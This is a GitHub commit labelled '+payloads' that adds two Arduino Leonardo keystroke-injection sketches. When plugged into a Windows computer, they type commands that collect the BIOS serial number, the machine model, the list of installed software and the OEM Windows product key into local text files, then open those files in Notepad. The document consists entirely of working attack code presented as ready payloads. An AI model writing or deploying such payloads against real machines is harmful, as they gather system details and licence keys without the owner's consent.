+payloads

This commit is contained in:
Joel Serna Moreno 2018-05-25 14:28:43 +02:00 committed by GitHub
parent cc06446e97
commit f0cd8a9ef1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 45 additions and 0 deletions

View File

@ -0,0 +1,24 @@
#include <phukdlib_leonardo.h>
#define kbd_es_es
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
Keyboard.press(KEY_LEFT_GUI);
delay(100);
Keyboard.releaseAll();
delay(2000);
Keyboard.println("cmd");
delay(3000);
Keyboard.println("wmic bios get serialnumber>>information.txt");
delay(3000);
Keyboard.println("wmic computersystem get model>>information.txt");
delay(7000);
Keyboard.println("wmic product get name>>information.txt");
delay(3000);
Keyboard.println("notepad information.txt");
while(1);
}

View File

@ -0,0 +1,21 @@
#include <phukdlib_leonardo.h>
#define kbd_es_es
void setup() {
Keyboard.begin();
}
void loop() {
delay(5000);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
delay(100);
Keyboard.releaseAll();
delay(2000);
Keyboard.println("cmd");
delay(3000);
Keyboard.println("wmic path softwarelicensingservice get OA3xOriginalProductKey>>productkey.txt");
delay(2000);
Keyboard.println("notepad productkey.txt");
while(1);
}